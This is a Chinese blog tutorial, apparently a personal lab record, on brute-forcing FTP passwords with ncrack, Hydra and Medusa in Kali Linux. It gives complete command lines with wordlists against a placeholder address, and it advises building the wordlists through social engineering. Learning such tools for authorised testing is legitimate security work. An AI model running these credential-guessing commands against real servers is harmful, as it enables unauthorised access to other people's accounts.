ftp密码破解——ncrack、hydra、medusa

ftp密码破解

                                        ——ncrack、Hydra、medusa

        下面和大家分享三个kali linux中的密码破解工具(ncrack,hydra、medusa),本文主要介绍一下一些关于ftp破解过程中的简单的命令。

        首先,我们可以通过直接在终端用ncrack得到ncrack版本以及相关命令的解释,如图

ftp密码破解——ncrack、hydra、medusa_第1张图片

直接上手操作,在我们不知道用户名以及密码的情况下爆破:

我们需要用字典生成工具生成一个字典,放在桌面上备用。

        命令:ncrack  –U  /root/桌面/pass.txt  –P  /root/桌面/pass.txt  ftp://000.000.000.000

       解释:-U为用户名,后面的/root/桌面/pass.txt 为爆破字典所在位置,同样-P为密码,后面的/root/桌面/pass.txt 也为爆破字典所在位置。只要你的字典足够强大,那么就是时间问题了。在组成字典的时候,要综合运用社工等方法形成一套适合的字典。ftp后面的000.000.000.000为ftp的地址,根据自己实际情况来改动。

在我们,知道用户名的情况下爆破:

       ncrack  --user  用户名  -P  /root/桌面/pass.txt  ftp://000.000.000.000

        解释同上,但要注意--user是两道杠,并且user是小写,kali linux大小写敏感。

用Hydra再来进行一遍一样的实验:

在不知用户名以及密码的情况下,采用自己生成的密码爆破:

        命令:hydra  ftp://000.000.000.000  -L  /root/桌面/pass.txt  -P  /root/桌面/pass.txt

在已知用户名的情况下爆破:

       命令:hydra  ftp://000.000.000.000  -l  用户名  -P  /root/桌面/pass.txt

注意大小写,小写的l,大写的P

      最后,来介绍一下medusa的操作方法

操作命令:

medusa

               -h target (ftp的地址)

               -H many targets

               -u 已知用户名

               -U 用户名的字典文件

               -p 已知密码

               -P 密码的字典

               -M 模式 ftp http telnet ssh

实战命令:

已知用户名爆破密码:

medusa  -h  000.000.000.000 -u 用户名 –P  /root/桌面/pass.txt  -M ftp

未知用户名爆破密码:

medusa -h  000.000.000.000  -U  /root/桌面/pass.txt –P  /root/桌面/pass.txt  -M ftp

       个人来说,比较喜欢hydra的界面,用户名和密码都能很清晰的显示出来。好了,至此两个工具的实验介绍就告一段落了,能力有限,只是写出了爆破时所需要的命令以及实验过程,作为自己的实验记录,欢迎各路大牛指正。本文仅用于学习交流,请勿用于违法操作。

你可能感兴趣的:(ftp密码破解——ncrack、hydra、medusa)